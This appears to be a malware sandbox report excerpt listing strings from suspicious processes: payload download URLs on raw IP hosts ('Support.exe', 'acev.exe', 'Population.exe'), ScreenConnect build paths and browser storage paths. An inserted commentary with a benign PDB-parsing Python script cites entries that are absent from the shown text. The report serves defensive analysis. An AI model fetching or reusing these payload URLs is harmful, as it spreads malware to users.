                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765388951.0000000000F2D000.00000002.00000001.01000000.00000008.sdmp, ix4A2DreBBsQwY6YHkidcDjo.exe, 00000012.00000000.1903447365.0000000000FCD000.00000002.00000001.01000000.00000012.sdmp, YAPNXRPmcarcR4ZDgC81Tbdk.exe, 00000013.00000000.1966000603.000000000024D000.00000002.00000001.01000000.00000013.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000014.00000000.2028047270.00000000002ED000.00000002.00000001.01000000.00000014.sdmp, 3HvoFOAmEaJswFCHOzyfyz5b.exe, 00000015.00000000.2102895090.0000000000EBD000.00000002.00000001.01000000.00000015.sdmp, 6KZmcK8r6beUzmRf6Ci6nx8d.exe, 00000016.00000000.2167482839.000000000091D000.00000002.00000001.01000000.00000016.sdmp, yDd3OJXsNQptgFrYILoygXLs.exe, 00000017.00000000.2231749071.0000000000EFD000.00000002.00000001.01000000.00000017.sdmp, xpTljBOh8s4KWiGtXsL1c00g.exe, 00000019.00000000.2295830605.00000000008DD000.00000002.00000001.01000000.00000019.sdmp, oZolmRBaYFkuutSgcOrBLSAQ.exe, 0000001E.00000000.2373071915.000000000067D000.00000002.00000001.01000000.0000001B.sdmp, V6uPDVniSnRMWuLn5U9T3TGJ.exe, 00000020.00000000.2460409209.000000000018D000.00000002.00000001.01000000.0000001C.sdmp, 2TUSzbAUfKRfcjcMzfoV1qdi.exe, 00000023.00000000.2556332589.000000000009D000.00000002.00000001.01000000.0000001D.sdmp, ixjnzi95HfqR77bieLYCT4aJ.exe, 00000024.00000000.2651179810.000000000002D000.00000002.00000001.01000000.0000001E.sdmp, 6pkNzPZrIkyPzGNsokLQ8aZR.exe, 00000025.00000000.2754908254.0000000000E7D000.00000002.00000001.01000000.0000001F.sdmp, hQdOgl4rhYQYx3G5aYY61LEd.exe, 00000026.00000000.2881740586.000000000063D000.00000002.00000001.01000000.00000020.sdmp, oZolmRBaYFkuutSgcOrBLSAQ.exe.4.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
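The "Binary string" rows above come from a plain string scan, which is why several entries carry overlapped neighbours ("Pilo.pdb\888", "Pilo.pdba444", "...WindowsInstaller.pdbQ"). The authoritative source of a PDB path is the CodeView RSDS record in the debug directory, which also carries the GUID and age that link a binary to its symbol file and make a useful pivot for clustering builds. The script below is an added example, not code from the report: `extract_rsds` parses RSDS records from a byte buffer and `scan_pdb_strings` reproduces the string-scan fallback with a non-greedy match so the overlap junk is dropped. The GUID, the decoy record and the buffer layout in `build_sample` are constructed for the demonstration; the ScreenConnect path is the one listed above.

```python
import re
import struct
import uuid

# CodeView record: b"RSDS" | GUID (16 bytes, Windows mixed-endian) | Age (uint32 LE) | NUL-terminated path
RSDS_SIG = b"RSDS"
MAX_PATH = 260


def extract_rsds(data: bytes):
    """Yield (guid, age, pdb_path) for each plausible RSDS CodeView record in a byte buffer."""
    off = data.find(RSDS_SIG)
    while off != -1:
        rec = off + 4
        end = data.find(b"\0", rec + 20)
        if rec + 20 <= len(data) and end != -1:
            path = data[rec + 20:end]
            # A genuine record carries a short printable path; this skips random 'RSDS' hits
            if 0 < len(path) < MAX_PATH and all(0x20 <= b < 0x7F for b in path):
                guid = uuid.UUID(bytes_le=data[rec:rec + 16])
                age = struct.unpack_from("<I", data, rec + 16)[0]
                yield str(guid), age, path.decode("ascii")
        off = data.find(RSDS_SIG, off + 4)


# Fallback: plain string scan (what the sandbox's "Binary string" rows come from). Non-greedy,
# so overlapped neighbours such as "Pilo.pdba444" or "...Installer.pdbQ" still yield the path.
PDB_STRING_RE = re.compile(rb"[A-Za-z]:\\[^\x00-\x1f\"<>|]{1,250}?\.pdb|[A-Za-z0-9_.\-]{1,64}\.pdb")


def scan_pdb_strings(data: bytes):
    return sorted({m.group(0).decode("ascii", "replace") for m in PDB_STRING_RE.finditer(data)})


def build_sample(guid: uuid.UUID, age: int, path: bytes) -> bytes:
    """Constructed buffer: filler, a decoy 'RSDS', one real record, more filler, a loose overlapped string."""
    record = RSDS_SIG + guid.bytes_le + struct.pack("<I", age) + path + b"\0"
    return b"\x00" * 16 + b"RSDS not a record" + b"\x90" * 8 + record + b"\xcc" * 8 + b"Pilo.pdba444\0"


SAMPLE_GUID = uuid.UUID("12345678-1234-5678-9abc-def012345678")   # arbitrary, constructed
SAMPLE = build_sample(SAMPLE_GUID, 1,
                      rb"C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb")

if __name__ == "__main__":
    for guid, age, path in extract_rsds(SAMPLE):
        print(f"RSDS guid={guid} age={age} pdb={path}")
    print("string scan:", scan_pdb_strings(SAMPLE))
```

On a real file, feed `extract_rsds` the whole image (or a process memory dump) and treat the RSDS result as the primary artifact; fall back to `scan_pdb_strings` only for binaries whose debug directory has been stripped, and expect the fallback to pick up leftovers from any embedded or overlapping payloads as well.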
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005D5880 InternetOpenW,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_005D5880
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $fq3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\fq equals www.youtube.com (Youtube)
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\fq equals www.youtube.com (Youtube)
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`,fq equals www.youtube.com (Youtube)
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,fq#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/
                            Source: sys_updater.exe, 0000001B.00000003.2757593840.00000159F35FD000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E49505000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exe
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exe:
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exeX
                            Source: explert.exe, 00000004.00000003.2049062888.000000000142F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exeh7
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BD6000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exelert.exe
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BD6000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exelert.exe)Gg
                            Source: sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exelert.exejF
                            Source: sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exeswFCHOzyfyz5b.exe
                            Source: explert.exe, 00000004.00000003.2114234135.000000000142F000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.2801052059.000000000142F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F35EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/Support.exey
                            Source: explert.exe, 00000004.00000003.1829245052.0000000001424000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1847987081.0000000001424000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/acev.exe
                            Source: explert.exe, 00000004.00000003.1829245052.0000000001424000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1847987081.0000000001424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/acev.exe%
                            Source: explert.exe, 00000004.00000003.1829245052.0000000001424000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1847987081.0000000001424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/acev.exeu
                            Source: explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/acev.exexplert.exe
                            Source: explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.10.57/selectex-file-host/acev.exexplert.exeG
                            Source: explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.218/
                            Source: explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.218/Population.exe
                            Source: explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.218/Population.exeU
                            Source: explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.218/Population.exet.exeh
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2163427307.00000234D5BBC000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2171457608.00000234D5AB9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651808657.0000021E0314C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2668665930.0000021E0343C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2746248549.00000159F356C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2768752871.00000159F3574000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2940578009.0000020E494EB000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2892087005.0000020E4948C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.cU
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2163427307.00000234D5BBC000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5C04000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5B00000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2171457608.00000234D5AB9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651808657.0000021E0314C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2668665930.0000021E0343C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2746248549.00000159F356C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F38E4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F35B3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2768752871.00000159F3574000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E49844000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2940578009.0000020E494EB000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E494D3000.00000004.00000020.00020000.00000000.sdmp, 
sys_updater.exe, 0000001F.00000003.2892087005.0000020E4948C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.ca8
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2163427307.00000234D5BBC000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5C04000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5B00000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2171457608.00000234D5AB9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651808657.0000021E0314C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2668665930.0000021E0343C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2746248549.00000159F356C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F38E4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F35B3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2768752871.00000159F3574000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E49844000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2940578009.0000020E494EB000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E494D3000.00000004.00000020.00020000.00000000.sdmp, 
sys_updater.exe, 0000001F.00000003.2892087005.0000020E4948C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2163427307.00000234D5BBC000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5C04000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5B00000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2171457608.00000234D5AB9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651808657.0000021E0314C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2668665930.0000021E0343C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2746248549.00000159F356C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F38E4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F35B3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2768752871.00000159F3574000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E49844000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2940578009.0000020E494EB000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E494D3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2892087005.0000020E4948C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: sys_updater.exe, 00000018.00000003.2650108761.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2650910116.0000021E02FD0000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651562106.0000021E02FD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.2
                            Source: sys_updater.exe, 00000018.00000003.2650108761.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2650910116.0000021E02FD0000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651562106.0000021E02FD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microso(
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2163427307.00000234D5BBC000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5C04000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5B00000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2171457608.00000234D5AB9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651808657.0000021E0314C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2668665930.0000021E0343C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03483000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2746248549.00000159F356C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F38E4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F35B3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2768752871.00000159F3574000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E49844000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2940578009.0000020E494EB000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E494D3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2892087005.0000020E4948C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://ocsp.digicert.com0A
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://ocsp.digicert.com0C
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://ocsp.digicert.com0X
